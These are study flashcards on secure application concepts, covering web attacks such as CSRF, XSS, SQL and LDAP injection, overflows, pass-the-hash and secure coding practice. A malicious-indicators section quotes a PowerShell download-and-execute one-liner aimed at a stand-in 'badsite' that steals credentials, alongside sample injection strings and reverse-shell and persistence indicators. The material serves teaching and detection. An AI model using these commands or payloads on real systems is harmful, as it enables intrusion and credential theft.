Lesson 14 Secure App Conecpts Flashcards
TOCTOU
Time of Check/Time of Use
Race condition
CSRF (or XSRF, same) Cross Site Request Forgery
Client Side or Cross Site Request Forgery
- exploit applications that use cookies to authenticate users and track sessions
attacker gains control of the session cookie by tricking the victim to start session with target while previously signed in to the trusted target
SSRF Server Side Request Forgeries
Server Side Request Forgeries exploit the lack of authentication between internal servers and services (implicit trust) and weak input validation
- allows the server to process arbitrary requests to target another service
- allows the attacker to submit unsanitized requests or API parameters
Session Hijacking
replaying a cookie in some way
attackers gain session cookies from sniffing on a public or unsecure network
Counter moves are to:
- encrypt cookies during transmission
- delete cookies from clients browser cache after session is completed
- deliver new cookie for each new session
Proper session management and token generation
- use non-predictable algorithm for token generation
- limit lifespan of a session
- require reauthentication after a certain period of time
API Attacks
App Programing Interface allow consumers to automate services on a web server and cloud services
Attackers exploit
- ineffective secrets management, allowing APi Keys to be discovered
- lack of input validation, unsanitized input
- error messages which give too much details about the system or network
- DoS by bombarding with spurious calls, protect through throttling/rate limiting mechanisms
Percent Encoding in a URL
Allows a user-agent to submit any safe or unsafe character to the server within a URL
% = %25 / = %2F \ = %5C < = %3C > = %3E = %20
replay attack
using a valid session token via sniffing or guessing to re-establish a web app session illegitimately
PtH attack
Pass the Hash attack
attack uses hashed password on protocols that allow hashed passwords for authentication
such as Server Message Block (SMB) or NTLM or Kerberos
good for horizontal movement
difficult attack to detect as it exploits valid network behavior
DLL injection
Dynamic Link Library injection
exploits the OS functionality of allowing one process to attach to another
malware can inject a malicious library and then force a process to load it
Indicators:
- opening of unexpected network connections
- interacting with files and the registry in a suspicious manner
DoS
Denial of Service
attack causing the system or service to be temporarily or permanently unavailable
-send a bombardment of spurious calls to an api
- mitigate through throttling/rate-limiting mechanisms
SSL Stripping or HTTP Downgrade
- Combines a down grade attack with a man in the middle attack
- Effectively the attacker is a proxy, setting up a secure HTTP path with the server, while using an HTTP non-secure connection with the victim.
- Victim then sends credentials in the clear to the MitM who then uses the secure channel to the server
Mitigation:
- Instruct browsers not to use http
- Instruct Servers not to respond to http requests, only https requests
Memory Leak
an attack that causes a device to to run out of memory (resource exhaustion) causing system instability or crash
- can lead to a DoS
- starting sessions but not letting them complete causing state tables to fill
- resource exhaustion can lead to conditions for privilege escalation
race condition
a condition where a service attempts to perform two operations at nearly the same time, but due to the nature of the system must be done in the correct order
can lead to a DoS or other instability
can lead to a null pointer dereference causing a app to crash
Shimming
Creating or modifying a DLL, driver, or API to get an app to act in a malicious way
A type of DDL injection attack
Attacks a feature of Windows which allows for apps to run as if on legacy Window OSs
Refactoring
rewriting code to perform same function but using different new methods
Malware uses to change it’s signature to avoid AV sw detection
Normalization
A form of input validation
strips illegal characters from input and converted to the acceptable values prior to being entered into or processed by the database
Execution Control
Allow list
Block list
Execution control is a process of determining what additional sw or scripts may be installed or run on a host beyond its baseline
Allow list
- a list of allowable processes and scripts
- highly restrictive and can impede immediate needs/fixes
Block list
- a list of processes and scripts which can not be executed on the host
- it is permissive but vulnerable to sw which has not previously been identified as malicious
LAMP
LAMP (Linux, Apache, MySQL, PHP/Perl/Python) is a very common example of a web service stack, after its four original components: the Linux operating system, the Apache HTTP Server, the MySQL relational database management system (RDBMS), and the PHP programming language.
Application Attacks
application vulnerabilities is a design flaw allowing security to be circumvented
- Privileged Escalation
- Error handling
- Improper Input handling
Privilege Escalation
- allows for arbitrary code execution or even remote code execution
- Vertical Privilege Escalation allowing a user/app can access functionality or data not available to them
- Horizontal Privilege Escalation a user gains access to functionality or data intended for another user
Indictor:
- User or app running with higher than expected privileges
Error handling uses in app attacks
App attacks can cause errors in an attempt to glean more system details
An app should not divulge too much system information when an error occurs, such as type and configuration of a database server
Improper Input Handling
Most app attacks work by passing invalid or maliciously constructed data to the vulnerable process
Developers should always test for valid inputs
Usually described as overflow or injection type attacks
Overflow app attack
Attacker submits input which is too large to be stored in the variable assigned by the application
Indicators
- unexplained crashes
- error messages following a download
- execution of a new app or script
- connection to new hardware
Common attack types:
- buffer overflow
- integer overflow
Buffer Overflow
An attacker passes data to over fill the buffer of the stack, an area of memory used by a an application
The attacker can changed the return address or add code to execute a script (arbitrary code execution)
Stack Overflow
A stack is an area of memory used by a program sub routine which includes a return address of the program which called the subroutine.
Attacker can use a buffer overflow to change the return address to call malicious code instead of returning to the calling routine.
Integer Overflow
Attacker causes the target application to exceed the bounds defined by an integer to change the value from positive to negative.
Attacker could also attempt to make the buffer smaller in order allow a buffer overflow attack
Pass the Hash
a credential exploit technique used for lateral movement
attacker gains a users cached credentials when logged into a single sign on system allowing attacker to use the credentials on other systems.
Usually is the hashed password and can be used on Windows file sharing protocol Server Message Block (SMB) or other protocols which accept NTLM hashes as authentication
Click jacking
Victim sees and trusts an web app with page containing a malicious layer allowing an attacker to intercept or redirect user input
launched by a compromise allowing the attacker to run arbitrary code as a script
mitigate by:
- HTTP response headers instructing browsers to not open frames from different origins (domains)
- ensuring buttons or input boxes are on the top most layer
XSS Attacks
Cross Site Scripting (XSS) is an application attack exploiting client browsers trust in scripts coming from a server
Three Types:
Non-Persistent/Reflective
Persistent/Stored
Client Side DOM
Involves use of input validation vulnerability
Will see or %script text in the URL crafted by an attacker
XSS Non-Persistent/Reflective
Cross Site Scripting (XSS) Non-Persistent/Reflective
- requires 3 actions
- attacker identifies input validation vulnerability in the trusted site
- attacker crafts a URL performing code injection against the trusted site and sends to victim to click the link
- once URL is clicked, trusted site sends the page with the injected malicious code, and browser executes the code
XSS Persistent/Stored Attack
Cross Site Scripting Persistent/Stored is an application attack
- aims to insert malicious code into a back-end database used by the trusted site
- the malicious code is then served to the client and executed on the clients browser
- this makes it persistent since all visitors will get the malicious code
- can be accomplished on sites with no input sanitation, like a message board
XSS Client side scripts/DOM
Cross Site Scripting (XSS) client side scripts exploits Vulnerabilities in the client side scripts which often use the DOM to modify content and layout of a web page.
- requires site to have input validation vulnerability and be identified by the attacker
- requires attacker to craft a URL to exploit the vulnerability and user to click it. Attacker adds a call to the malicious script
- server returns the page and if script is in the DOM it will get executed in the clients browser
SQLi Attacks
Structured Query Language Injection attacks utilize input validation vulnerability to craft a SQL query within the URL
- will see a true statement in the input, like ‘or 1=1’, which tells SQL to return all info from the table
- requires input to not be sanitized
XML injection attacks
Exploits XML files which are not encrypted or input validated
Vulnerable to spoofing, request forgery, and injection of arbitrary data or code
Example is XML External Entity (XXE) where the SYSTEM entry is modified to some /etc file like /etc/config, which will then display the contents of the /etc/config as part of the response.
LDAP injection Attacks
Lightweight Directory Access Protocol injection attacks exploit unauthenticated access or vulnerability in a client app to submit arbitrary LDAP queries.
- similar to SQL injection just a different query language
- requires input to not be sanitized and use of something like bob)&()) for a username to bypass the password portion causing the password filter to be dropped for a condition thats always true
Directory Traversal
An injection attack performed against a web app server
- input allows attacker to use the (../) directory traversal to navigate to the root directory
- only works on non sanitized input and files are not properly controlled via permissions
- only works on server side file system
Command Injection Attack
Attack on a web app server attempting to run OS shell commands and return output to the browser
- requires some effort to get around server security mechanisms but successful attempts is usually due to misconfiguration of the server
Secure Coding Techniques
Input Validation
Normalization
Output encoding
ServerSide vs ClientSide validation
Client Side
- offloads processing from Server
- gives too much control to client which could be vulnerable to malware, etc
Server Side
- More secure than client
- Not realistic in large deployment
Bad practice to rely solely on client side validation
Web App Security - Secure Cookies
Secure Cookies
- avoid using persistent cookies, always new session cookies
- Set secure attributes to prevent transport over HTTP
- set HttpOnly to not allow DOM/Client-side scripting
- use SameSite attribute to control where cookie may be sent to mitigate forgery attacks
Web Security - Response Headers important settings from server to client
Response headers
- HTTP Strict Transport Security (HSTS) forces browser to use HTTPS only
- Content Security Policy (CSP) to mitigate client side attacks (clickjacking, script injection, etc)
- Cache-Control to prevent caching of data to protect confidential and personal information
Error Handling
Code must be written handle errors in such a way an attacker can not execute malicious code or perform an injection attack
Also do not divulge system information (platform info or inner workings of code) in the text of an error handler, better to use custom handlers to control what is displayed
Secure Code Usage
Code reuse - could expose vulnerability when used in a new set of conditions
3rd party library - need to monitor for vulnerabilities
SDK (software development kit) - need to monitor for vulnerabilities
Stored Procedures - provides a more secure method for DB queries as the queries are predefined
Dead Code
Should be removed as it is could be misused by an attack to exploit a vulnerability or misused in some way
Also indicates code is not well maintained
Obfuscation
Use of an obfuscator on the compiled code to make the code more difficult to reverse engineer or mentally tough to analyze.
A obfuscator randomizes the names of variables, constants, functions and procedures, as well as, removes comments, spaces of the compiled code.
Static Code Analysis
Analysis of code prior to being packaged as an executable.
Table Tops/code reviews of the code by others than the developer is ideal as it can detect potential issues or code to assist an insider threat, such as backdoors, logic bombs.
- can run source code analysis sw to scan for signatures of known issues, such as the OWASP top 10 or injection vulnerabilities
Dynamic Code Analysis
Testing code under real world conditions using a staging environment
Fuzzing
- testing the input validation routines of code.
- can be test or a vulnerability scanner to exercise random inputs, valid and invalid, to the code and reports the results
- several types of fuzzers, Application UI, Protocol, and File Format
Code Signing
provides authenticity and integrity of the code
- developer creates a hash of the code and then signs it using their private key
- code is shipped with the developers code signing certificate which contains a public key for the dest computer uses to read and verify the signature
- The OS then prompts the user to accept or deny the code
OS based execution control
Execution control is allow/block lists managed by an OS using 3rd party sec tools:
Windows built in features for this:
- Software Restriction Policies (SRP)
- AppLocker
- Windows Defender Application Control (WDAC)
Linux
- uses MAC (Mandatory Access Control) kernel module
- or Linux Security Module (LSM)
- SELinux
- AppArmor
Malicous Code Indicators
Main types of malicious activities when threat hunting or using a sandbox:
ShellCode - small program to exploit buffer overflow to gain privileges and then attack a network connection for downloading additional tools
Credential Dumping - access to credentials files or sniffing memory by the Isass.exe sys process
Lateral movement/insider attack - executing process remotely (psexec) to widen access by opening firewall ports or creating an account
Persistence - a backdoor an attacker uses when the host is restarted or user logs off. Look for AutoRun keys in the registry, adding a scheduled task, etc.
PowerShell malicious indicators
Cmdlets invoked to run some binary shell code
PowerShell.exe “IEX (New-Object NetWebClient) Downloadstring (‘https: //badsite); Do-Evil -StealCreds
Bypassing execution policy
-noprofile or -ExecutionPolicy bypass arguments
System calls to the Windows API
[Kernal32]::LoadLibrary(.dll)
Using another type of script to execute the PowerShell is also suspicious
Bash and Python Malicious Indicators
Use of whoami and ifconfig/ipconfig to establish local context
Use of wget or curl to download tools
crontab entries added to enable persistence
add user to sudo and enable remote access via ssh
use iptables to change firewall rules
use nmap to scan other hosts
use of a reverse shell
high cpu usage and memory as happens with a crypto miner program, use top and free to diagnose
Macros and VB applications
A malicious actor could use Word document as a vector to execute a PowerShell script using a macro
Man in the Browser attack
An on path attack where the web browser is compromised
Requires privileges and allows the attacker to inspect session cookies, certs, and data, change browser settings, perform redirection and inject code
Attackers use various sw kits installed on web servers which then down load plugins or scripts to the client when visiting the server
Automaton Scalabilty
The costs involved in supplying the service to more users is linear
if number of users double the cost to maintain the same level of service would also double. If more that double, then the service is less scalable
Automation Elasticity
The systems ability to handle changes on demand in real time.
High elasticity means the system will not experience loss of service or performance if the demand suddenly doubles.
The converse is also true, when demand is low the costs are reduced
Being able to reduce power or shut down when demand is low. When demand picks up the resource can grow in power to the level required.
SecDevOps environments
Development - code is developed
Test/integration - code from developers are merged together for initial testing, code builds and requirements met
Staging - a mirror of the production environment, focusing on usability and performance using test data
Production - application is released to end users
Provisioning
Process of deploying an application to the target environment
Deprovisioning
Process of removing an application from packages or instances
Version Control
An ID system for each iteration of a software product
Continuous Integration
developers should commit and test updates often
Effective CI uses automation test suite to validate each build quickly
Continuous Delivery
Testing the infrastructure that supports the app, including networking, database functionality, client sw, etc
Continuous Deployment
process of actually making changes to the production environment to support the new app version
Continuous Monitoring
used to detect service failures and security incidents
should include monitoring of failover components
this capability is provided by security orchestration and response (SOAR) management sw
Continuous Validation
A verification and validation of a requirements model
Verification - ensures the product or system meets design goals
Validation - process to determine whether the appliaction is fit-for-purpose
must ensure there is no drift from secure configuration baseline